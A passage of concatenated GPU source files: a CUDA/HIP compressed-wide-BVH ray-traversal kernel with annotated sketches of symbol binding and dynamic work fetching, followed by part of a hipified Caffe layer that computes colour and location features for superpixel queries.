if (t > tmin && t < tmax) { if (u >= 0.0f && u <= 1.0f) { if (v >= 0.0f && u + v <= 1.0f) { triangleuv.x = u; triangleuv.y = v; tmax = t; hitAddr = triAddr; } } } triangleGroup.y &= ~(1 << triangleIndex); } if (nodeGroup.y <= 0x00FFFFFF) { if (stackPtr > 0) { STACK_POP(nodeGroup); } else { rayResultBuffer[rayidx].t_triId_u_v = make_float4(tmax, int_as_float(hitAddr), triangleuv.x, triangleuv.y); break; } } #if DYNAMIC_FETCH const int Nd = 4; const int Nw = 16; lostLoopIterations += __popc(__activemask()) - Nd; if (lostLoopIterations >= Nw) break; #endif } while (true); } while (true); } __host__ void rtBindCWBVHData( const float4* InBVHTreeNodes, const float4* InTriangleWoopCoordinates, const int* InMappingFromTriangleAddressToIndex) { cudaCheck(hipMemcpyToSymbol(MappingFromTriangleAddressToIndex, &InMappingFromTriangleAddressToIndex, 1 * sizeof(InMappingFromTriangleAddressToIndex))); cudaCheck(hipMemcpyToSymbol(TriangleWoopCoordinates, &InTriangleWoopCoordinates, 1 * sizeof(InTriangleWoopCoordinates))); cudaCheck(hipMemcpyToSymbol(BVHTreeNodes, &InBVHTreeNodes, 1 * sizeof(InBVHTreeNodes))); } __host__ void rtTraceCWBVH( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount ) { float elapsedTime; hipEvent_t startEvent, stopEvent; cudaCheck(hipEventCreate(&startEvent)); cudaCheck(hipEventCreate(&stopEvent)); int* cudaFinishedRayCount; cudaCheck(hipMalloc(&cudaFinishedRayCount, sizeof(int))); dim3 blockDim(32, 2); dim3 gridDim(32, 32); hipProfilerStart(); cudaCheck(hipEventRecord(startEvent, 0)); { hipMemset(cudaFinishedRayCount, 0, sizeof(int)); hipLaunchKernelGGL(( rtTraceCWBVHDynamicFetch) , dim3(gridDim), dim3(blockDim) , 0, 0, rayBuffer, rayResultBuffer, rayCount, cudaFinishedRayCount ); } cudaCheck(hipEventRecord(stopEvent, 0)); cudaCheck(hipEventSynchronize(stopEvent)); cudaCheck(hipEventElapsedTime(&elapsedTime, startEvent, stopEvent)); Log("%.3fMS, %.2fMRays/s (rtTraceCWBVH Dynamic Fetch)", elapsedTime, (float)rayCount / 1000000.0f / (elapsedTime / 1000.0f)); hipProfilerStop(); hipFree(cudaFinishedRayCount); }
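/*
 * Editor's sketch (illustration only): rtBindCWBVHData above sets the
 * __device__ globals (BVHTreeNodes, TriangleWoopCoordinates, ...) by copying
 * the pointer *values* into the symbols with hipMemcpyToSymbol /
 * cudaMemcpyToSymbol. The reduced CUDA form of that pattern, with a toy
 * symbol name:
 */
#include <cuda_runtime.h>

__device__ const float4 *gNodes;           // device-side global, like BVHTreeNodes

void bindNodes(const float4 *d_nodes)      // d_nodes points to a device allocation
{
    // Copies sizeof(const float4*) bytes -- the pointer value itself -- into
    // gNodes, so subsequent kernels can dereference gNodes directly.
    cudaMemcpyToSymbol(gNodes, &d_nodes, sizeof(d_nodes));
}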
7508b6a3d70a35bdba48ac9621a59b73cf6059e9.cu
#include <cuda_profiler_api.h> #include "helper_math.h" #include "FastDeviceMinMax.h" #include "Logger.h" #include "CUDAAssert.h" __device__ unsigned __bfind(unsigned i) { unsigned b; asm volatile("bfind.u32 %0, %1; " : "=r"(b) : "r"(i)); return b; } __device__ __inline__ uint sign_extend_s8x4(uint i) { uint v; asm("prmt.b32 %0, %1, 0x0, 0x0000BA98;" : "=r"(v) : "r"(i)); return v; } __device__ __inline__ uint extract_byte(uint i, uint n) { return (i >> (n * 8)) & 0xFF; } __device__ const float4* BVHTreeNodes; __device__ const float4* TriangleWoopCoordinates; __device__ const int* MappingFromTriangleAddressToIndex; #define DYNAMIC_FETCH 1 #define TRIANGLE_POSTPONING 1 #define STACK_POP(X) { --stackPtr; if (stackPtr < SM_STACK_SIZE) X = traversalStackSM[threadIdx.x][threadIdx.y][stackPtr]; else X = traversalStack[stackPtr - SM_STACK_SIZE]; } #define STACK_PUSH(X) { if (stackPtr < SM_STACK_SIZE) traversalStackSM[threadIdx.x][threadIdx.y][stackPtr] = X; else traversalStack[stackPtr - SM_STACK_SIZE] = X; stackPtr++; } __global__ void rtTraceCWBVHDynamicFetch( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount, int* finishedRayCount ) { const float ooeps = exp2f(-80.0f); const int STACK_SIZE = 32; uint2 traversalStack[STACK_SIZE]; const int SM_STACK_SIZE = 8; // Slightly smaller stack size than the paper (12), as this seems faster on my GTX1080 __shared__ uint2 traversalStackSM[32][2][SM_STACK_SIZE]; int rayidx; float3 orig, dir; float tmin, tmax; float idirx, idiry, idirz; uint octinv; uint2 nodeGroup = make_uint2(0); uint2 triangleGroup = make_uint2(0); char stackPtr = 0; int hitAddr = -1; float2 triangleuv; __shared__ int nextRayArray[2]; const float4* localBVHTreeNodes = BVHTreeNodes; const float4* localTriangleWoopCoordinates = TriangleWoopCoordinates; do { int& rayBase = nextRayArray[threadIdx.y]; bool terminated = stackPtr == 0 && nodeGroup.y <= 0x00FFFFFF; const unsigned int maskTerminated = __ballot_sync(__activemask(), terminated); const int numTerminated = __popc(maskTerminated); const int idxTerminated = __popc(maskTerminated & ((1u << threadIdx.x) - 1)); if (terminated) { if (idxTerminated == 0) rayBase = atomicAdd(finishedRayCount, numTerminated); rayidx = rayBase + idxTerminated; if (rayidx >= rayCount) break; orig = make_float3(rayBuffer[rayidx].origin_tmin); dir = make_float3(rayBuffer[rayidx].dir_tmax); tmin = rayBuffer[rayidx].origin_tmin.w; tmax = rayBuffer[rayidx].dir_tmax.w; idirx = 1.0f / (fabsf(dir.x) > ooeps ? dir.x : copysignf(ooeps, dir.x)); // inverse ray direction idiry = 1.0f / (fabsf(dir.y) > ooeps ? dir.y : copysignf(ooeps, dir.y)); // inverse ray direction idirz = 1.0f / (fabsf(dir.z) > ooeps ? dir.z : copysignf(ooeps, dir.z)); // inverse ray direction octinv = ((dir.x < 0 ? 1 : 0) << 2) | ((dir.y < 0 ? 1 : 0) << 1) | ((dir.z < 0 ? 
1 : 0) << 0); octinv = 7 - octinv; nodeGroup = make_uint2(0, 0b10000000000000000000000000000000); triangleGroup = make_uint2(0); stackPtr = 0; hitAddr = -1; } #if DYNAMIC_FETCH int lostLoopIterations = 0; #endif do { if (nodeGroup.y > 0x00FFFFFF) { const unsigned int hits = nodeGroup.y; const unsigned int imask = nodeGroup.y; const unsigned int child_bit_index = __bfind(hits); const unsigned int child_node_base_index = nodeGroup.x; nodeGroup.y &= ~(1 << child_bit_index); if (nodeGroup.y > 0x00FFFFFF) { STACK_PUSH(nodeGroup); } { const unsigned int slot_index = (child_bit_index - 24) ^ octinv; const unsigned int octinv4 = octinv * 0x01010101u; const unsigned int relative_index = __popc(imask & ~(0xFFFFFFFF << slot_index)); const unsigned int child_node_index = child_node_base_index + relative_index; float4 n0, n1, n2, n3, n4; n0 = __ldg(localBVHTreeNodes + child_node_index * 5 + 0); n1 = __ldg(localBVHTreeNodes + child_node_index * 5 + 1); n2 = __ldg(localBVHTreeNodes + child_node_index * 5 + 2); n3 = __ldg(localBVHTreeNodes + child_node_index * 5 + 3); n4 = __ldg(localBVHTreeNodes + child_node_index * 5 + 4); float3 p = make_float3(n0); int3 e; e.x = *((char*)&n0.w + 0); e.y = *((char*)&n0.w + 1); e.z = *((char*)&n0.w + 2); nodeGroup.x = float_as_uint(n1.x); triangleGroup.x = float_as_uint(n1.y); triangleGroup.y = 0; unsigned int hitmask = 0; const float adjusted_idirx = uint_as_float((e.x + 127) << 23) * idirx; const float adjusted_idiry = uint_as_float((e.y + 127) << 23) * idiry; const float adjusted_idirz = uint_as_float((e.z + 127) << 23) * idirz; const float origx = -(orig.x - p.x) * idirx; const float origy = -(orig.y - p.y) * idiry; const float origz = -(orig.z - p.z) * idirz; { // First 4 const unsigned int meta4 = float_as_uint(n1.z); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.z) : float_as_uint(n2.x); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.x) : float_as_uint(n3.z); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.x) : float_as_uint(n2.z); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.z) : float_as_uint(n4.x); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.z) : float_as_uint(n3.x); uint swizzledHiz = (idirz < 0) ? 
float_as_uint(n3.x) : float_as_uint(n4.z); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } { // Second 4 const unsigned int meta4 = float_as_uint(n1.w); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.w) : float_as_uint(n2.y); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.y) : float_as_uint(n3.w); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.y) : float_as_uint(n2.w); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.w) : float_as_uint(n4.y); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.w) : float_as_uint(n3.y); uint swizzledHiz = (idirz < 0) ? 
float_as_uint(n3.y) : float_as_uint(n4.w); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } nodeGroup.y = (hitmask & 0xFF000000) | (*((byte*)&n0.w + 3)); triangleGroup.y = hitmask & 0x00FFFFFF; } } else { triangleGroup = nodeGroup; nodeGroup = make_uint2(0); } #if TRIANGLE_POSTPONING const int totalThreads = __popc(__activemask()); #endif while (triangleGroup.y != 0) { #if TRIANGLE_POSTPONING const float Rt = 0.2; const int threshold = totalThreads * Rt; const int numActiveThreads = __popc(__activemask()); if (numActiveThreads < threshold) { STACK_PUSH(triangleGroup); break; } #endif int triangleIndex = __bfind(triangleGroup.y); int triAddr = triangleGroup.x * 3 + triangleIndex * 3; float4 v00 = __ldg(localTriangleWoopCoordinates + triAddr + 0); float4 v11 = __ldg(localTriangleWoopCoordinates + triAddr + 1); float4 v22 = __ldg(localTriangleWoopCoordinates + triAddr + 2); float Oz = v00.w - orig.x*v00.x - orig.y*v00.y - orig.z*v00.z; float invDz = 1.0f / (dir.x*v00.x + dir.y*v00.y + dir.z*v00.z); float t = Oz * invDz; float Ox = v11.w + orig.x*v11.x + orig.y*v11.y + orig.z*v11.z; float Dx = dir.x * v11.x + dir.y * v11.y + dir.z * v11.z; float u = Ox + t * Dx; float Oy = v22.w + orig.x*v22.x + orig.y*v22.y + orig.z*v22.z; float Dy = dir.x*v22.x + dir.y*v22.y + dir.z*v22.z; float v = Oy + t*Dy; 
if (t > tmin && t < tmax) { if (u >= 0.0f && u <= 1.0f) { if (v >= 0.0f && u + v <= 1.0f) { triangleuv.x = u; triangleuv.y = v; tmax = t; hitAddr = triAddr; } } } triangleGroup.y &= ~(1 << triangleIndex); } if (nodeGroup.y <= 0x00FFFFFF) { if (stackPtr > 0) { STACK_POP(nodeGroup); } else { rayResultBuffer[rayidx].t_triId_u_v = make_float4(tmax, int_as_float(hitAddr), triangleuv.x, triangleuv.y); break; } } #if DYNAMIC_FETCH const int Nd = 4; const int Nw = 16; lostLoopIterations += __popc(__activemask()) - Nd; if (lostLoopIterations >= Nw) break; #endif } while (true); } while (true); } __host__ void rtBindCWBVHData( const float4* InBVHTreeNodes, const float4* InTriangleWoopCoordinates, const int* InMappingFromTriangleAddressToIndex) { cudaCheck(cudaMemcpyToSymbol(MappingFromTriangleAddressToIndex, &InMappingFromTriangleAddressToIndex, 1 * sizeof(InMappingFromTriangleAddressToIndex))); cudaCheck(cudaMemcpyToSymbol(TriangleWoopCoordinates, &InTriangleWoopCoordinates, 1 * sizeof(InTriangleWoopCoordinates))); cudaCheck(cudaMemcpyToSymbol(BVHTreeNodes, &InBVHTreeNodes, 1 * sizeof(InBVHTreeNodes))); } __host__ void rtTraceCWBVH( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount ) { float elapsedTime; cudaEvent_t startEvent, stopEvent; cudaCheck(cudaEventCreate(&startEvent)); cudaCheck(cudaEventCreate(&stopEvent)); int* cudaFinishedRayCount; cudaCheck(cudaMalloc(&cudaFinishedRayCount, sizeof(int))); dim3 blockDim(32, 2); dim3 gridDim(32, 32); cudaProfilerStart(); cudaCheck(cudaEventRecord(startEvent, 0)); { cudaMemset(cudaFinishedRayCount, 0, sizeof(int)); rtTraceCWBVHDynamicFetch <<< gridDim, blockDim >>> ( rayBuffer, rayResultBuffer, rayCount, cudaFinishedRayCount ); } cudaCheck(cudaEventRecord(stopEvent, 0)); cudaCheck(cudaEventSynchronize(stopEvent)); cudaCheck(cudaEventElapsedTime(&elapsedTime, startEvent, stopEvent)); Log("%.3fMS, %.2fMRays/s (rtTraceCWBVH Dynamic Fetch)", elapsedTime, (float)rayCount / 1000000.0f / (elapsedTime / 1000.0f)); cudaProfilerStop(); cudaFree(cudaFinishedRayCount); }
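/*
 * Editor's sketch (illustration only, reduced from rtTraceCWBVHDynamicFetch):
 * the persistent-threads "dynamic fetch" pattern. Lanes that have finished
 * their ray vote together, the first finished lane reserves a contiguous batch
 * of ray indices with one atomicAdd, and each finished lane takes one index
 * from the batch. Assumes blockDim.x == 32 and blockDim.y == 2, matching the
 * original launch, so threadIdx.y identifies the warp. doWork and the
 * parameter names are placeholders.
 */
__device__ void doWork(int idx) { /* per-ray traversal would go here */ }

__global__ void dynamicFetchSketch(int workCount, int *nextWorkItem)
{
    __shared__ int workBase[2];               // one slot per warp (blockDim.y == 2)

    while (true) {
        // In this reduced sketch every lane is always ready for new work.
        unsigned mask = __activemask();
        int numIdle = __popc(mask);
        int idxIdle = __popc(mask & ((1u << threadIdx.x) - 1));

        if (idxIdle == 0)                     // first idle lane reserves a batch
            workBase[threadIdx.y] = atomicAdd(nextWorkItem, numIdle);
        __syncwarp(mask);                     // make the reservation visible to the warp

        int myItem = workBase[threadIdx.y] + idxIdle;
        if (myItem >= workCount)
            return;                           // global queue exhausted

        doWork(myItem);
    }
}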
4ae4d817aeba51488562dce2a1e5f6feede2c4e5.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> #include <cstdio> #include <opencv2/core/core.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> #include <boost/chrono.hpp> #include "caffe/layers/lowlevel_distance_layer.hpp" using std::cout; using std::endl; using cv::Mat; namespace caffe { // Calculate Grid features template <typename Dtype> __global__ void CalculateGridFeatures(const int nthreads, const int grid_size, const int num, const int channels, const int height, const int width, const Dtype* const data, Handcrafted* grid_features) { CUDA_KERNEL_LOOP(index, nthreads) { const int n = index / (grid_size * grid_size); const int grid_index = index % (grid_size * grid_size); const int grid_x = grid_index % grid_size; const int grid_y = grid_index / grid_size; const int output_idx = (n * grid_size + grid_y) * grid_size + grid_x; const int x_start = grid_x * (width / grid_size); const int x_end = (grid_x + 1) * (width / grid_size) - 1; const int y_start = grid_y * (height / grid_size); const int y_end = (grid_y + 1) * (height / grid_size) - 1; float color_mean[10] = {0}; float color_histo[10][8] = {0}; // collect features for (int c = 0; c < channels; c++) { // (0, 1, 2) : 0-mean normalized BGR data const Dtype* data_slice = data + (n * channels + c) * height * width; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { color_mean[c] += data_slice[y * width + x]; // Bin size : 256 / 8 = 32 int bin_idx = data_slice[y * width + x] / 32; color_histo[c][bin_idx] += 1; } } color_mean[c] /= ((width / grid_size) * (height / grid_size)); for (int j = 0; j < 8; j++) { color_histo[c][j] /= ((width / grid_size) * (height / grid_size)); } } Handcrafted* current_hc = &(grid_features[output_idx]); for (int i = 0; i < channels; i++) { current_hc->color_mean[i] = color_mean[i]; for (int j = 0; j < 8; j++) { current_hc->color_histogram[i][j] = color_histo[i][j]; } } current_hc->center_location[0] = (y_start + y_end) / 2.0; current_hc->center_location[1] = (x_start + x_end) / 2.0; } } // Calculate Region features and label template <typename Dtype> __global__ void CalculateRegionFeatures(const int nthreads, const int num, const int channels, const int height, const int width, const int R, const int slic_xdim, const int slic_ydim, const int spixel_size, const Dtype* const data, const Dtype* const label_map, const Dtype* const slic_index_data, const float* const query_indexes, Handcrafted* query_features, Dtype* label_output, Dtype* query_output) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; const int query_sp_idx = query_indexes[index]; const int slic_yind = query_sp_idx / slic_xdim; const int slic_xind = query_sp_idx % slic_xdim; const int x_start = max((slic_xind - 2) * spixel_size, 0); const int x_end = min((slic_xind + 2) * spixel_size, width); const int y_start = max((slic_yind - 2) * spixel_size, 0); const int y_end = min((slic_yind + 2) * spixel_size, height); float color_mean = 0; float color_histo[8] = {0}; float center_x = 0; float center_y = 0; if (label_map != NULL && current_channel == 0) { int count = 0; label_output[index] = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { label_output[index] += label_map[(n * height + y) * width + x]; count += 1; } } } if 
(count != 0) { label_output[index] /= count; } else { label_output[index] = 255; } } // copy index in order to synchronize depth current and mcs current query_output[index] = query_indexes[index]; const Dtype* data_slice = data + (n * channels + current_channel) * height * width; int count = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { //printf("slic_index_data : %f \n", slic_index_data[(n * height + y) * width + x]); // printf("(n * height + y) * width + x : %d \n", // (n * height + y) * width + x); //printf("query_sp_idx : %d \n", query_sp_idx); // printf("data_slice : %f \n", data_slice[y * width + x]); count += 1; color_mean += data_slice[y * width + x]; int bin_idx = data_slice[y * width + x] / 32; color_histo[bin_idx] += 1; if (current_channel == 0) { center_x += x; center_y += y; } } } } if (count == 0) { count = 1; } color_mean /= count; if (current_channel == 0) { center_x /= count; center_y /= count; } for (int j = 0; j < 8; j++) { color_histo[j] /= count; } Handcrafted* current_hc = &(query_features[index]); for (int i = 0; i < channels; i++) { current_hc->color_mean[current_channel] = color_mean; for (int j = 0; j < 8; j++) { current_hc->color_histogram[current_channel][j] = color_histo[j]; } } if (current_channel == 0) { current_hc->center_location[0] = center_y; current_hc->center_location[1] = center_x; } } } __device__ inline int GetOffset(const int n, const int c, const int h, const int w, const int C, const int H, const int W) { return (((n * C + c) * H + h) * W + w); } // Calculate distance between query and grid features template <typename Dtype> __global__ void CalculateDistanceBetweenQueryAndGrid(const int nthreads, const int N, const int R, const int channels, const int height, const int width, const int grid_size, const int dim_output, const Handcrafted* grid_features, const Handcrafted* query_features, Dtype* const top_data, int option) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; //const int r = index % R; const Handcrafted* sliced_grid_features = &(grid_features[n * grid_size * grid_size]); const Handcrafted* current_query_features = &(query_features[index]); for (int gx = 0; gx < grid_size; gx++) { for (int gy = 0; gy < grid_size; gy++) { int grid_index = gy * grid_size + gx; int chidx = current_channel * (dim_output - 2) / channels; // top channel index // BGR color difference float grid_val = sliced_grid_features[grid_index].color_mean[current_channel]; float query_val = current_query_features->color_mean[current_channel]; if (option != 1) { // Query region val *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = query_val/256 - 0.5; //printf("mcs_query_val: %f \n", query_val/256 - 0.5); chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = grid_val/256 - 0.5; //printf("mcs_query_val: %f \n", grid_val/256 - 0.5); chidx += 1; } if (option == 0) { // histogram for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp1; chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp2; chidx += 1; } } else if (option == 3) { float 
sum = 0; for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; sum += 2 * (tmp1 - tmp2) * (tmp1 - tmp2) / (tmp1 + tmp2 + 0.00000001); } *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = sum / 4.0; chidx += 1; } if (current_channel == channels - 1) { // Location difference *(top_data + GetOffset(index, dim_output - 2, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[0] - current_query_features->center_location[0])/(height/2); *(top_data + GetOffset(index, dim_output - 1, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[1] - current_query_features->center_location[1])/(width/2); } } } } } // Pick R regions to query template<typename Dtype> void LowlevelDistanceLayer<Dtype>::PickQueryRegions(const Blob<Dtype>* dead_spmap) { int N = dead_spmap->shape(0); int map_h = dead_spmap->shape(2); int map_w = dead_spmap->shape(3); //printf("R_ : %d \n", R_); //printf("map_w * map_h * N : %d \n", map_w * map_h * N); if (R_ == map_w * map_h * N) { // test phase. query all regions float* qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int i = 0; i < R_; i++) { *qindx_ptr = i; qindx_ptr += query_region_indexes_.offset(0, 1); } } else { float* const qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int n = 0; n < N; n++) { vector<float> candidates; // Pick R regions const Dtype* dead_spmap_ptr = dead_spmap->cpu_data() + dead_spmap->offset(n); for (int w = 0; w < map_w; w++) { for (int h = 0; h < map_h; h++) { bool is_dead = (dead_spmap_ptr[dead_spmap->offset(0, 0, h, w)] == 1); if (!is_dead) { candidates.push_back(h*map_w + w); } } } // randomly pick R superpixels std::random_shuffle(candidates.begin(), candidates.end()); for (int r = 0; r < R_; r++) { qindx_ptr[query_region_indexes_.offset(n, r)] = candidates[r]; } } } } template<typename Dtype> void generate_multicolor_data(const Blob<Dtype>& data, Blob<Dtype>* const mcs_data) { const Dtype* data_cpu = data.cpu_data(); Dtype* mcs_data_cpu_ptr = mcs_data->mutable_cpu_data(); int num = data.shape(0); int channels = data.shape(1); int height = data.shape(2); int width = data.shape(3); int mcs_channels = mcs_data->shape(1); const unsigned char MEAN[3] = {104, 117, 123}; cv::Mat bgr_mat(height, width, CV_8UC3); cv::Mat hsv_mat; cv::Mat lab_mat; for (int n = 0; n < num; n++) { for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { bgr_mat.at<cv::Vec3b>(h, w)[c] = static_cast<unsigned char>( data_cpu[((n * channels + c) * height + h) * width + w] + MEAN[c]); } } } cv::cvtColor(bgr_mat, hsv_mat, CV_BGR2HSV); cv::cvtColor(bgr_mat, lab_mat, CV_BGR2Lab); // convert to blob for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { mcs_data_cpu_ptr[((n * mcs_channels + c) * height + h) * width + w] = static_cast<float>(bgr_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 3) * height + h) * width + w] = static_cast<float>(hsv_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 6) * height + h) * width + w] = static_cast<float>(lab_mat.at<cv::Vec3b>(h, w)[c]); } } } } } // --------------------------------------------------- // // Caffe forward implementation // // --------------------------------------------------- template <typename Dtype> void 
